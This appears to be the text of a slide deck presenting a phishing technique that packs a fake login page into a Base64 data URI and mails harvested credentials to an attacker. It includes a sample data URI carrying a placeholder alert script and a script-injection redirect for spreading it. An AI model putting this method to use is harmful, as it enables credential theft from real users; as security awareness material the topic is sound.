Upload
ajin-abraham
View
1.399
Download
0
Embed Size (px)
DESCRIPTION
New way of phishing with Data URI
Citation preview
PHISHING WITH DATA URI
DATA URI• The data URI scheme is a URI scheme (
Uniform Resource Identifier scheme) that provides a way to include data in-line in web pages as if they were external resources.
• MORE INFO : http://en.wikipedia.org/wiki/Data_URI_scheme
PHISHING OLD METHOD
login.phpLogs.txtUsername: [email protected]: strong p@ssw0rd
FAKE URL
All these are hosted under a website
Phishing with Data URI
mailer.phpHyperlink / Redirect
This fake page is not hosted anywhere. Its made up of DATA URI, Base64 encoded data
Mails the hacker the stolen username and password.
Modified source code Base64 encoded
Modification: send the username and password logged to a php file which may mail/logs it.
Source code
data:text/html;base64, PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=
Spreading<script>window.location = "data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="</script>
DATA URI PHISHING
Limitations
• Difficult to inject JavaScript in websites.• Internet Explorer won’t support Data URI
DEMO